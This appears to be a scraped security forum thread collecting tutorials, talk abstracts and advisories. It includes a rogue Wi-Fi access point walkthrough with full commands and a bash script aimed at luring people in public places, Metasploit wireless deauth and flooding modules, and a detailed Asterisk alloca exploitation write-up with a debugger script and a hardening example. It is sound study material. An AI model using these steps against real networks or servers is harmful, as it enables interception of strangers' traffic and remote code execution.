The whole tutorial is about playing with a target and implementing new things into it. The article is not for newbies; you must know how the tools used in this tutorial work.

Tutorials: http://199.201.127.158/index.php?dir=RCE%20Tutorials/REPT%20Reverse%20Engineering%20Techniques/

Via: REPT Reverse Engineering Techniques No. 1 - rohitab.com - Forums
-
INTRODUCTION TO ARM LINUX EXPLOITING
Metin KAYA
kayameti@gmail.com
2013.01.09, 15:30, Istanbul
Metin KAYA - Official Web Site [EnderUNIX]
http://www.twitter.com/_metinkaya

This paper is the Linux version of the document http://www.signalsec.com/publications/arm_exploiting.pdf, which covers exploiting ARM on Windows systems. Thanks to Celil ÜNÜVER for inspiring me.

The ARM architecture is used in crucial positions, e.g. mobile phones, femtocells, smallcells, SCADA systems and POS machines. Basic knowledge of ARM, GDB, GCC, C, assembly, Python and some bash commands is necessary to understand what is going on in the document. The host machine is x86 Linux (32 bit, 3.5.0 kernel), so an ARM cross compiler [1] is required for the target machine, which is ARMv7 little-endian Linux (32 bit, 2.6.34 kernel).

Download: http://packetstorm.foofus.com/papers/general/exploit_arm_linux_en.pdf
-
Create Wireless Rogue Access Point

Description: In this video I will show you how to create a fake access point. What is the purpose of creating this fake access point? Let's say you are in a public place with all your wifi attack gadgets, and you set up a fake access point there with the AP name "FreeNetOnlyForToday"; maybe people will try to connect to this AP. Now what can you do? You can fire Metasploit at them, because all their connections belong to you, and there is tons of other stuff you can perform. In the next video I will cover how to create a fake AP and get passwords.

Steps:

[code]
apt-get install dhcp3-server
airmon-ng start wlan0
airbase-ng -e FreeNet -c 11 -v wlan0
ifconfig at0 up
# at0 must sit inside the subnet declared in dhcpd.conf below. The steps as
# posted used 11.0.0.254 / 11.0.0.0 here against a 10.0.0.0/24 subnet
# declaration, which dhcpd rejects ("No subnet declaration for at0").
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
[/code]

---- Add config in dhcp3 ----
Path = /etc/dhcp3/dhcpd.conf
---- Paste this ----

[code]
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;

subnet 10.0.0.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.255;
  option routers 10.0.0.254;
  option domain-name-servers 8.8.8.8;
  range 10.0.0.1 10.0.0.140;
}
[/code]

[code]
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
# -d -f keeps dhcpd in the foreground: run the ip_forward line from another
# shell, or enable forwarding before starting dhcpd.
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0
echo "1" > /proc/sys/net/ipv4/ip_forward
[/code]

If you find it boring to type all these commands, no problem: use this bash script, which automates the whole process. But check all the connections in the bash script or you will get an error.

Source: exploit.co.il

[code]
#!/bin/bash
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;
echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan0 # Change to your wlan interface
sleep 5;
airmon-ng start wlan0 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface
sleep 5;
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
sleep 5;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5;
echo "1" > /proc/sys/net/ipv4/ip_forward
[/code]

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Create Wireless Rogue Access Point
-
Iran's Real Life Cyberwar

Description:

Abstract

The recent Stuxnet, Flame and CA compromises involving Comodo and DigiNotar had three common elements: each was government sponsored, each involved Iran and all three involved a PKI compromise. The presenter will share experience of dealing with the Iranian attack, highlighting the ways in which government sponsored attacks are very different from both 'ordinary' criminal attacks and the Hollywood view of 'cyberwarfare'.

*****

Speaker: Phillip Hallam-Baker, Vice President and Principal Scientist, Comodo Inc.

Dr Hallam-Baker is an internationally recognized computer security specialist credited with 'significant contributions' to the design of HTTP 1.0, the core protocol of the World Wide Web. His book 'dotCrime Manifesto: How to Stop Internet Crime' sets out the first technical blueprint for how to make the Web and the Internet a less crime permissive environment by introducing accountability controls for transactions that require them. Hallam-Baker has made significant contributions to core Internet security protocols, including XKMS, SAML, WS-Security, WS-Trust and KEYPROV. He has participated in standards groups in IETF, W3C and OASIS and played a key role in establishing the concept of Extended Validation certificates as an industry standard.

Original Source: Iran's Real Life Cyberwar - Phillip Hallam-Baker on Vimeo

Source: Iran's Real Life Cyberwar
-
Sql Server Exploitation, Escalation And Pilfering

Description:

Abstract

During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally, newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worthwhile for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks.

*****

Speakers

Antti Rantasaari, Security Consultant, NetSPI
Antti Rantasaari is currently a security consultant at NetSPI. He is responsible for performing security assessments and contributing to the development of the methodologies, techniques, and tools used during network and application penetration testing.

Scott Sutherland, NetSPI
Scott Sutherland is a Principal Security Consultant at NetSPI. Scott is responsible for the development and execution of penetration testing for the firm. He has developed a number of the proprietary tools and techniques that the company uses and also plays a major role in the skills development and training of the NetSPI network and application penetration testing team. Scott is an active participant in the information security community, regularly contributing technical security blog posts, whitepapers, and presenting at a wide variety of conferences.

Original Source: SQL Server Exploitation, Escalation and Pilfering - Antti Rantasaari and Scott Sutherland on Vimeo

Source: Sql Server Exploitation, Escalation And Pilfering
-
Wireless Exploitation Using Metasploit Framework

Description:

In this video I will show you how to use Metasploit auxiliary DoS modules for wireless exploitation. The modules are not very effective in general, but some, such as beacon frame fuzzing and flooding, are very effective. I will cover more auxiliary modules in the next video. I have used three modules.

auxiliary/dos/wifi/fakeap
This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool.

auxiliary/dos/wifi/deauth
This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID.

auxiliary/dos/wifi/ssidlist_beacon
This module sends out beacon frames using SSIDs identified in a specified file and randomly selected BSSIDs. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID from this script. For a list of common SSIDs to use with this script, check WiGLE - Wireless Geographic Logging Engine - SSID Stats. If a file of SSIDs is not specified, a default list of 20 SSIDs will be used. This script will run indefinitely until interrupted.

Source: Penetration Testing Software | Metasploit

Source: Wireless Exploitation Using Metasploit Framework
-
Unraveling Some Of The Mysteries Around Dom-Based Xss

Description:

Abstract

DOM-based XSS was first revealed to the world back in 2005 by Amit Klein, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it is poorly understood. This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review.

*****

Speaker

Dave Wichers, COO, Aspect Security
Dave Wichers is a cofounder and the Chief Operating Officer (COO) of Aspect Security, a company that specializes in application security services. He is also a long time contributor to OWASP, including being a member of the OWASP Board since it was formed in 2003. Dave has over 20 years of experience in the information security field, and has focused exclusively on application security since 1998. At Aspect, in addition to his COO duties, he is Aspect's application security courseware…

Original Source: Unraveling Some of the Mysteries around DOM-Based XSS - Dave Wichers on Vimeo

Source: Unraveling Some Of The Mysteries Around Dom-Based Xss
-
Since we're discussing this anyway, why don't you also post some projects you've made?

PHP:
- VL Download CMS (a download script)
- Selenity CMS (a small portal)
- The "class" website (the graphics came out acceptable)
- A guy's bachelor's thesis

Visual Basic 6:
- Yahoo! Manager v1.2
- Digital Keylogger v3.0/4.0
- Royal Crypter v3.0
- Lots of other junk (IP locator and who knows what else...)

C#:
- About 3 projects for work

C++:
- DarkyBinder v2.0 (the first and only binder for Linux)
- FileDownloader (WinAPI)
- DataKiller (deletes everything it can get hold of)
- High school/university stuff (linked lists, a BigInt class and other silly things)
+ I'm a C++ programmer (Linux), so I've written a fair few lines of code

I estimate roughly 50,000 lines of code written in total (across all the languages I know, more or less), which seems rather little to me, but there's time.
-
So in the last 3 months you've written over 10,000 lines of code in 5 different languages?
-
Which programming languages do you KNOW? And by that I mean "In which programming languages have you written OVER 2000 lines of code?" You could also post when you wrote your last line of code. Vote. No joking around.
-
HyperDbg

HyperDbg is a kernel debugger that leverages hardware-assisted virtualization. More precisely, HyperDbg is based on a minimalistic hypervisor that is installed while the system runs. Compared to traditional kernel debuggers (e.g., WinDbg, SoftIce, Rasta R0 Debugger), HyperDbg is completely transparent to the kernel and can be used to debug kernel code without the need for serial (or USB) cables. For example, HyperDbg allows single-stepping the execution of the kernel, even when the kernel is executing exception and interrupt handlers. Compared to traditional virtual machine based debuggers (e.g., the VMware built-in debugger), HyperDbg does not require the kernel to be run as a guest of a virtual machine, while being just as powerful.

Feel free to contact us for suggestions, criticisms, and bug reports through the HyperDbg Google group: hyperdbg | Google Groups

Further details about HyperDbg are available in the paper "Dynamic and Transparent Analysis of Commodity Production Systems" (published in the proceedings of ASE 2010). The paper can be downloaded here.

Download: http://code.google.com/p/hyperdbg/
-
[h=1]Defrag Tools: #22 - WinDbg - Memory Kernel Mode[/h]

By: Larry Larsen, Andrew Richards, Chad Beeder

In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a kernel mode debug session.

We cover these commands:
!vm
!vm 1
!memusage 8
!poolused 2
!poolused 4
!poolfind <tag>
!pool <addr>
!pool <addr> 2
!pte

Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution.

Resources:
Microsoft Windows SDK for Windows 7 and .NET Framework 4
Sysinternals LiveKD
Sysinternals RAMMap

Timeline:
[00:45] - Sysinternals LiveKD debug of the machine
[01:47] - Virtual Memory summary (!vm 1)
[05:10] - Sysinternals LiveKD live kernel dump (livekd.exe -m -o kernel.dmp)
[09:30] - Sysinternals RAMMap
[11:10] - Memory List summary (!memusage 8)
[16:15] - Pool Usage by Non-Paged Pool (!poolused 2)
[20:16] - Pool Tags (c:\debuggers\triage\pooltag.txt)
[28:06] - Pool Usage by Paged Pool (!poolused 4)
[29:27] - Pool issues lead to Bugchecks
[34:00] - Find Pool by Address (!pool <addr>)
[36:05] - Find Pool by Tag (!poolfind <tag>)
[40:30] - Page Table Entry (PTE) and Page Frame Number (PFN) (!pte <addr>)
[42:45] - Sometimes it is a physical hardware failure

Video: Defrag Tools: #22 - WinDbg - Memory Kernel Mode | Defrag Tools | Channel 9
-
DoS? Then Who Was Phone?

Introduction

This post presents exploitation notes on a vulnerability we discovered in Asterisk, an open source telephony solution produced by Digium. We reported this bug to Digium on November 27th, 2012, and provided it to customers of the Exodus Intelligence Feed as EIP-2012-0008. Digium released the advisory AST-2012-014 for this vulnerability on January 2nd, 2013, which was picked up shortly after by some of the aggregator sites and incorrectly categorized as a denial-of-service; however, this bug is certainly exploitable. As we found it fun to analyze, and since discussions about server-side memory bugs are a little sparse nowadays, we thought it would be cool to share for others who might also find it interesting.

Vulnerability

The vulnerability resides in the HTTP Asterisk Management Interface (AMI) service, and is the result of an alloca being used to "allocate" memory with a remotely-supplied, untrusted size value. The vulnerability is present in the Asterisk source code file main/http.c, specifically in the function ast_http_get_post_vars, which as the name would suggest is used to parse HTTP POST variable data. A snip of the pertinent vulnerable code in this function is shown below:

[code]
struct ast_variable *ast_http_get_post_vars(
    struct ast_tcptls_session_instance *ser, struct ast_variable *headers)
{
    int content_length = 0;
    struct ast_variable *v, *post_vars=NULL, *prev = NULL;
    char *buf, *var, *val;

    for (v = headers; v; v = v->next) {
        if (!strcasecmp(v->name, "Content-Type")) {
            if (strcasecmp(v->value, "application/x-www-form-urlencoded")) {
                return NULL;
            }
            break;
        }
    }

    for (v = headers; v; v = v->next) {
        if (!strcasecmp(v->name, "Content-Length")) {
            content_length = atoi(v->value) + 1;
            break;
        }
    }

    if (!content_length) {
        return NULL;
    }

    if (!(buf = alloca(content_length))) {
        return NULL;
    }

    if (!fgets(buf, content_length, ser->f)) {
        return NULL;
    }
    /* ... */
[/code]

The code shows the length value being converted from the Content-Length string using atoi, then incremented by one and stored in the content_length variable. Memory is obtained by alloca for the expected content length, and pointed to by *buf. Finally, fgets is called to read the expected amount of content data into this buffer. I found it interesting that the code looks as though it may have been written with memory management issues in mind, as the check to ensure content_length is not zero would catch an integer overflow caused by adding one to the value.

Below is a snip of disassembled code for the vulnerable function as compiled in the Asterisk package shipped with Ubuntu. This snip shows the size value being set and used to subtract the stack pointer (ESP) to "allocate" stack memory:

[code]
<ast_http_get_post_vars+187>: call <strtol@plt>
<ast_http_get_post_vars+192>: mov edx,eax
<ast_http_get_post_vars+194>: add edx,0x1
<ast_http_get_post_vars+197>: je <ast_http_get_post_vars+408>
<ast_http_get_post_vars+203>: mov ecx,DWORD PTR [ebp-0x30]
<ast_http_get_post_vars+206>: add eax,0x1f
<ast_http_get_post_vars+209>: and eax,0xfffffff0
<ast_http_get_post_vars+212>: sub esp,eax <----- LOL
<ast_http_get_post_vars+214>: lea esi,[esp+0x1b]
[/code]

As shown, the alloca is compiled into a simple set of instructions to ADD and AND-off the size to be allocated from the stack. It then subtracts the revised size from the stack pointer, and stores an address derived from this into the ESI register for further use.

Exploitation Obstacles

Since most compilers implement alloca as a fairly direct subtraction of the stack pointer, the exploitation of alloca is often as simple as providing a size value large enough to wrap the stack pointer around to a desirable location higher on the stack. Subsequent use of the pointer to store remotely supplied data would then result in stack memory corruption, and allow for vanilla exploitation techniques to gain control of program execution flow. However, here the vulnerable code uses the function fgets to read network data into the obtained memory space. This complicates the situation for exploitation as the libc implementation of fgets performs a check on its length argument to ensure that it is not beyond the signed integer boundary of 0x7FFFFFFF. If this check fails, fgets does not read data and returns an error. The code snip below shows the check performed inside of fgets as implemented in libc.6.so:

[code]
<fgets+0>: sub esp,0x4c
<fgets+3>: mov DWORD PTR [esp+0x48],ebp
<fgets+7>: mov ebp,DWORD PTR [esp+0x54]
<fgets+11>: mov DWORD PTR [esp+0x3c],ebx
<fgets+15>: call <mov_esp_ebx>
<fgets+20>: add ebx,0x14051c
<fgets+26>: mov DWORD PTR [esp+0x40],esi
<fgets+30>: mov esi,DWORD PTR [esp+0x58]
<fgets+34>: test ebp,ebp
<fgets+36>: mov DWORD PTR [esp+0x44],edi
<fgets+40>: jle <fgets+336>
...
<fgets+336>: mov DWORD PTR [esp+0x50],0x0
<fgets+344>: jmp <fgets+256>
...
<fgets+256>: mov eax,DWORD PTR [esp+0x50]
<fgets+260>: mov ebx,DWORD PTR [esp+0x3c]
<fgets+264>: mov esi,DWORD PTR [esp+0x40]
<fgets+268>: mov edi,DWORD PTR [esp+0x44]
<fgets+272>: mov ebp,DWORD PTR [esp+0x48]
<fgets+276>: add esp,0x4c
<fgets+279>: ret
[/code]

The EBP register, containing the length argument, is checked to be a positive signed value using the TEST and JLE instructions at <fgets+34> and <fgets+40>. If the check fails, the code jumps to return an error, making fgets unusable for exploiting a wrapped stack pointer to overwrite memory with data read from the network. While stack corruption by this means is still possible through the pushing and moving of data to the stack by other compiled code operations, the lack of control and limited set of operations make this approach undesirable.

At this point some might categorize this vulnerability as purely theoretical or possibly even unexploitable. As I hope many readers would agree, a challenge of this nature is always inviting. The Exodus team loves goading and trolling one another in these scenarios, usually with something along the lines of "Yeah, it is probably too tough for you to exploit…" or "you should probably just give up." The recipient of this pep talk usually proceeds to cry and reevaluate the code until an idea hits them or they decide to resign to a life of PCI compliance auditing. Challenge accepted.

EIP Control

After spending some time analyzing the problem and hating computers, I found a way to exploit this vulnerability. The HTTP listener for the Asterisk Management Interface handles every new connection by creating a new thread to execute a designated worker function to process the request. The code to set up and complete this task is spread out across multiple functions and macros and is a little messy, so we'll try to keep details to a minimum.

The HTTP AMI is started initially by a call chain of functions starting with ast_http_init, which calls __ast_http_load, which then calls ast_tcptls_server_start. The function ast_tcptls_server_start performs standard TCP socket setup operations, and is defined as:

[code]
void ast_tcptls_server_start(struct ast_tcptls_session_args *desc)
[/code]

Despite the name, ast_tcptls_server_start is used for both TLS and non-TLS service setup. The single argument taken by this function is a structure describing aspects of the server to be started. From __ast_http_load, the call looks like:

[code]
ast_tcptls_server_start(&http_desc);
[/code]

The structure http_desc is defined in main/http.c as:

[code]
static struct ast_tcptls_session_args http_desc = {
    .accept_fd = -1,
    .master = AST_PTHREADT_NULL,
    .tls_cfg = NULL,
    .poll_timeout = -1,
    .name = "http server",
    .accept_fn = ast_tcptls_server_root,
    .worker_fn = httpd_helper_thread,
};
[/code]

The .accept_fn is a function pointer for a function to accept the connection, and the worker_fn is a pointer to the worker function responsible for processing the request once a new thread is created. After more setup code, a new thread is created to accept socket connections by calling the function ast_tcptls_server_root. For each TCP connection accepted on the listening HTTP port (default 8088), ast_tcptls_server_root calls the following thread creation wrapper to create a new thread and eventually call the worker function:

[code]
...
if (ast_pthread_create_detached_background(&launched, NULL, handle_tcptls_connection, tcptls_session)) {
    ast_log(LOG_WARNING, "Unable to launch helper thread: %s\n", strerror(errno));
    ast_tcptls_close_session_file(tcptls_session);
    ao2_ref(tcptls_session, -1);
}
...
[/code]

The function ast_pthread_create_detached_background is a macro wrapper for the function ast_pthread_create_stack. The macro definition looks roughly like:

[code]
ast_pthread_create_detached_stack(a, b, c, d, AST_BACKGROUND_STACKSIZE, ...)
[/code]

The important thing to note here is the argument AST_BACKGROUND_STACKSIZE. This is used by the function to set the new thread's stack size attribute before starting the thread:

[code]
pthread_attr_setstacksize(attr, stacksize ? stacksize : AST_STACKSIZE)
...
return pthread_create(thread, attr, start_routine, data);
[/code]

For builds without low memory restrictions defined, the AST_BACKGROUND_STACKSIZE and the AST_STACKSIZE macros are defined as:

[code]
#define AST_BACKGROUND_STACKSIZE AST_STACKSIZE
#define AST_STACKSIZE (((sizeof(void *) * 8 * 8) - 16) * 1024) /* becomes 0x3C000 */
[/code]

The use of AST_STACKSIZE, or 0x3C000, to set the size of the stack for each new HTTP thread is significant, as it means the stack of the newly created thread will begin at 0x3C000 below the top of the previous thread's stack. In turn, if a value of this size or greater is used for alloca pointer subtraction, the resulting stack pointer will overlap with the stack memory of a newer thread. By carefully synchronizing the state of the threads involved so they do not collide their shared use of stack memory, it is possible to use this behavior to overwrite the contents of one thread's stack area with network data read by another thread. To visualize this, and because I love drawing stack diagrams, I present the following bad art:

Synchronizing the two threads such that they do not collide and clobber each other's critical stack contents is as simple as not sending data when a given thread is expecting it. While one thread is waiting for data in a blocking read operation, the other thread may be using the stack. Using the HTTP POST method (as is required to trigger the vulnerability) allows for two separate network read operations per thread: one for the initial read of HTTP headers, and a second for reading the HTTP Content-Data. Having two individual network read operations per thread provides enough blocking opportunity to align the augmented stack pointer of the first thread to a desirable location used by the second thread. Better yet, this provides an opportunity to align the pointer of the first thread to a location that is not yet used by the second thread, but will be used once the second thread completes its initial read and resumes execution. The following diagram steps attempt to illustrate this process, ignoring trivial details and using round numbers for simplicity.

1. Two socket connections to the HTTP AMI service are established, causing Asterisk to create two threads to handle the connections. Both threads are expecting HTTP headers and so they are both blocking on a read operation. To depict the state of these threads:

2. Thread1 is sent HTTP headers with an HTTP Content-Length string equivalent to 0x3C900. Once headers are received, Thread1's initial read operation finishes. It performs the alloca, subtracting its stack pointer by 0x3C900, which places its pointer for *buf at 0x900 bytes down from the top of Thread2's stack:

3. Thread1 is then sent approximately 0x700 bytes of the 0x3C900 it is expecting. This advances the *buf pointer index used by fgets up the stack, closer to Thread2's current stack pointer. Thread1 continues waiting as it has not yet received the full amount of data expected (0x3C900).

4. Thread2, still waiting on its initial network read, is sent HTTP POST headers with a Content-Length string equivalent to approximately 0x200, which it uses for its own alloca, subtracting from its stack pointer. Coordinating this length carefully places it precisely where the *buf pointer in Thread1's fgets currently points. Thread2 then calls fgets to receive its HTTP Content-Data, causing it to block while waiting to read in data.

5. Thread1 is sent 4 more bytes of the data it is waiting to receive, which is stored starting at its current *buf index in fgets, and overwrites where Thread2's stored return address is for fgets. A return from fgets can then be triggered by sending the remaining data expected, or a newline character, or also by simply closing the connection. Once Thread2 returns, EIP is restored from the overwritten return address value and execution flow is controlled.

Protection Mechanisms

Precisely overwriting only desired stack contents leaves stack canaries intact so that they do not interfere with exploitation. To avoid non-executable memory protections, typical return-oriented techniques may be employed to reuse existing executable memory once execution flow is controlled. This leaves Address Space Layout Randomization (ASLR), and more specifically, Asterisk builds compiled as Position-Independent Executables (PIE), as the only remaining obstacle to overcome, as fixed return locations cannot be used in this case. While the default Makefile generated to compile Asterisk from source does not include flags for PIE, popular Linux distributions may package their own Asterisk built with PIE for extra security, such as with Ubuntu (props to @kees_cook for keeping us on our toes with this). ASLR via PIE significantly frustrates exploitation. Since Ubuntu is a popular distribution, and having set the bar for difficulty in this case, the Ubuntu Asterisk build is the target we challenged ourselves with.

Who Was Phone

I will save you from babble about entropy and efforts made to try and guess addresses in the presence of ASLR. Instead we will discuss how this vulnerability can be reliably exploited for memory disclosure, and used to determine the location of Asterisk code memory to redirect execution to. The function generic_http_callback in main/manager.c is the URL handling function executed when triggering the vulnerability, and is defined as:

[code]
static int generic_http_callback(struct ast_tcptls_session_instance *ser,
                                 enum ast_http_method method,
                                 enum output_format format,
                                 struct sockaddr_in *remote_address, const char *uri,
                                 struct ast_variable *get_params,
                                 struct ast_variable *headers)
{
[/code]

Above you can see the output_format argument format is an enumeration value for one of the possible formats used for the reply. Its expected possible values are 0, 1, or 2 for "plain", "html", "xml" respectively. This value is used to retrieve a pointer from a global array when constructing a response in generic_http_callback:

[code]
/* ... */
ast_str_append(&http_header, 0,
    "Content-type: text/%s\r\n"
    "Cache-Control: no-cache;\r\n"
    "Set-Cookie: mansession_id=\"%08x\"; Version=1; Max-Age=%d\r\n"
    "Pragma: SuppressEvents\r\n",
    contenttype[format],
    session->managerid, httptimeout);
/* ... */
ast_http_send(ser, method, 200, NULL, http_header, out, 0, 0);
/* ... */
[/code]

The contenttype array contains the pointers to the strings used for the HTTP response, and thus the pointer retrieved from this look-up directly influences data sent back to the HTTP user. By conducting the same style of stack pointer manipulation previously described, it is possible to align a thread's *buf pointer to overwrite the stack memory where format is stored, so it indexes beyond the contenttype array into other memory. With the help of some handy debugger scripting, I was able to find a pointer->pointer->code from a relative offset of contenttype. My code to do this with VDB is shown below. (Comments document the code a little bit, but a more extensive explanation of VDB is beyond the scope of this post):

[code]
import struct

# trace and ispoi() are provided by the VDB debugging session this runs in
for m in trace.getMemoryMaps():
    # check memory map name
    if m[3].lower() == "/usr/sbin/asterisk":
        # check for flags Read & Write for data segment
        if m[2] == 6:
            addr = m[0]
            memlen = m[1]
            memory = trace.readMemory(addr, memlen)
        # check for Execute flag
        elif m[2] == 5:
            # save beginning and ending of executable memory
            code = m[0]
            codestop = code+m[1]

# from each offset in the memory
for offset in range(memlen-4):
    # read for the size of a pointer
    ptr = struct.unpack("<I", memory[offset:offset+4])[0]
    # check if it is a pointer
    if ispoi(ptr):
        # read the value at the pointer
        ptr = struct.unpack("<I", trace.readMemory(ptr, 4))[0]
        # is that value in the asterisk code?
        if ptr > code and ptr < codestop:
            print " [*] Found 0x%08x -> 0x%08x" % (addr+offset, ptr)
[/code]

The script simply searches the memory maps of the attached process for the Asterisk data and code memory regions. Once they are found, the value at every possible offset in the data map is checked to be a valid memory address. Passing this check, the value at the memory it points to is then also checked to see if it is a pointer to code memory, and valid matches are printed out. This script identified 8 locations of usable pointers when run against Ubuntu's packaged Asterisk binary. By overwriting the saved format variable with an index to offset to one of these pointer sequences, it is possible to manufacture a remote memory disclosure and determine an address of Asterisk code memory. Putting this all together allows for successful remote arbitrary code execution despite ASLR/PIE/NX/STACK COOKIES/ALL_OF_THE_THINGS compiled in with the Ubuntu build.

To add to an already silly amount of convenience with the conditions surrounding this bug, when gaining EIP control through the method described, the next value on the stack above the overwritten return address is a pointer to the buffer passed to fgets in the second thread. This buffer is populated with the second thread's received HTTP Content-Data (remotely-controlled data). Using the memory disclosure to calculate the address of a call to the function ast_safe_system, which takes a single string pointer argument to execute as a command line, it is simple to exploit the return in the second thread to execute arbitrary commands from the Asterisk process -- which often runs as root. Using this to spawn a remote shell with Ubuntu's default dash shell is a little obnoxious, but possible, and an exercise left up to the reader.

Hope you enjoyed the post!

-- Brandon Edwards @drraid

Source: DoS? Then Who Was Phone?
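The two root causes the post walks through, an alloca() sized straight from an untrusted Content-Length and a read that trusts that length, shown next to a bounded version of the same parsing step. This is an added example written for this page, not Asterisk code and not Digium's fix: MAX_POST_BODY, the function names and the sample header/body values are my own constructed choices.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Ceiling for a single urlencoded POST body. An assumption made for this
 * example, not a constant taken from Asterisk or from AST-2012-014. */
#define MAX_POST_BODY 4096

/* The vulnerable shape described in the post: atoi() on the untrusted header,
 * +1, and the result handed to alloca(). Only a result of exactly zero is
 * rejected, so any other value, however large, reaches alloca(). This helper
 * returns the size that would be allocated instead of allocating it, so it is
 * safe to call; -1 stands in for the original's "return NULL". */
long vulnerable_alloca_size(const char *content_length_hdr)
{
    int content_length = atoi(content_length_hdr) + 1;
    if (!content_length) {
        return -1;              /* the only check the original performs */
    }
    return content_length;      /* would go straight into alloca() */
}

/* Hardened parsing: base-10 strtol that must consume the whole string, then
 * reject negative values and anything above our ceiling. Returns 0 and stores
 * the length in *out, or -1 when the header must be rejected. */
int parse_content_length(const char *content_length_hdr, size_t *out)
{
    char *end = NULL;
    long v;

    errno = 0;
    v = strtol(content_length_hdr, &end, 10);
    if (end == content_length_hdr || *end != '\0' || errno == ERANGE) {
        return -1;              /* empty, trailing junk, or does not fit a long */
    }
    if (v < 0 || v > MAX_POST_BODY) {
        return -1;              /* negative, or larger than the body we accept */
    }
    *out = (size_t)v;
    return 0;
}

/* Read exactly `len` body bytes into a heap buffer the caller frees. fread()
 * bounds the read by byte count rather than by newline, and the buffer is
 * NUL-terminated for whatever urlencoded parser runs next. */
char *read_post_body(FILE *f, size_t len)
{
    char *buf = malloc(len + 1);
    if (!buf) {
        return NULL;
    }
    if (fread(buf, 1, len, f) != len) {
        free(buf);
        return NULL;            /* short body: reject rather than parse partial data */
    }
    buf[len] = '\0';
    return buf;
}

/* Constructed end-to-end sample: a header value and a body served from an
 * in-memory stream so no socket is needed. Copies the accepted body into
 * `out` and returns 0, or -1 if any step rejects the input. */
int demo_roundtrip(const char *content_length_hdr, const char *body, char *out, size_t outsz)
{
    char stream_buf[256];
    size_t len;
    FILE *f;
    char *data;

    if (parse_content_length(content_length_hdr, &len) != 0) {
        return -1;
    }
    snprintf(stream_buf, sizeof stream_buf, "%s", body);
    f = fmemopen(stream_buf, strlen(stream_buf), "r");
    if (!f) {
        return -1;
    }
    data = read_post_body(f, len);
    fclose(f);
    if (!data) {
        return -1;
    }
    snprintf(out, outsz, "%s", data);
    free(data);
    return 0;
}

int main(void)
{
    char body[64];

    /* 248064 is 0x3C900, the length the post uses to reach the next thread's stack. */
    printf("vulnerable: Content-Length 248064 -> alloca(%ld)\n", vulnerable_alloca_size("248064"));
    printf("hardened:   Content-Length 248064 -> %s\n",
           demo_roundtrip("248064", "a=1", body, sizeof body) == 0 ? "accepted" : "rejected");
    if (demo_roundtrip("7", "a=1&b=2", body, sizeof body) == 0) {
        printf("hardened:   Content-Length 7 -> body \"%s\"\n", body);
    }
    return 0;
}
```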
-
[h=1]Ettercap <= 0.7.5.1 Stack Overflow Vulnerability[/h]

Title: Ettercap Stack overflow (CWE-121)
References: CVE-2012-0722
Discovered by: Sajjad Pourali
Vendor: http://www.ettercap.sourceforge.net/
Vendor contact: 13-01-01 21:20 UTC (No response)
Solution: Using the patch
Patch: http://www.securation.com/files/2013/01/ec.patch
Local: Yes
Remote: No
Impact: low
Affected:
- ettercap 0.7.5.1
- ettercap 0.7.5
- ettercap 0.7.4 and earlier
Not affected:
- ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44
[code]
enum {
   NS_IN6ADDRSZ = 16,
   NS_INT16SZ = 2,
   ETH_ADDR_LEN = 6,
